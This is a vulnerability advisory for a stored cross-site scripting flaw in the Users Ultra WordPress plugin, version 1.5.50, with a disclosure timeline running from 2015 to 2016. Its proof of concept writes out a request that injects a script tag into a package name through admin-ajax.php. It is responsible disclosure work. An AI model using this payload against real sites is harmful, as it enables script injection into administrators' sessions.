Users Ultra [Persistence XSS]

WordPress plugin Users Ultra suffers for an Persistence XSS vulnerability.

Description

Once a user is registered he can add new subscription packages or modify existing ones. No data sanitization is taking place before saving package details in DB. This allows a malicious user to include JS code in package name and/or package description.

PoC

• Send a post request to http://vuln.site.tld/wp-admin/admin-ajax.php with data: action=package_add_new&p_name=a<script>alert(1)</script>
• Visit http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership as admin or go to the page that contains package information at front end.

---

WordPress Plugins Persistent XSS XSS

---

INFO

• 20 October 2015
• Pan Vag
• usersultra.com
• wordpress.org
• 1.5.50
• WordPress 4.3.1

TIMELINE

• 2015-10-20:
  Requested CVE ID
• 2015-10-29:
  Vendor notified via email
• 2015-11-11:
  Requested CVE ID (no response from 2015-10-20)
• 2015-11-11:
  Vendor notified via contact form in his website
• 2015-11-13:
  Vendor notified via support forums at wordpress.org
• 2015-11-14:
  Vendor responded and received report through email
• 2016-02-06:
  Requested CVE ID (no response from 2015-11-11)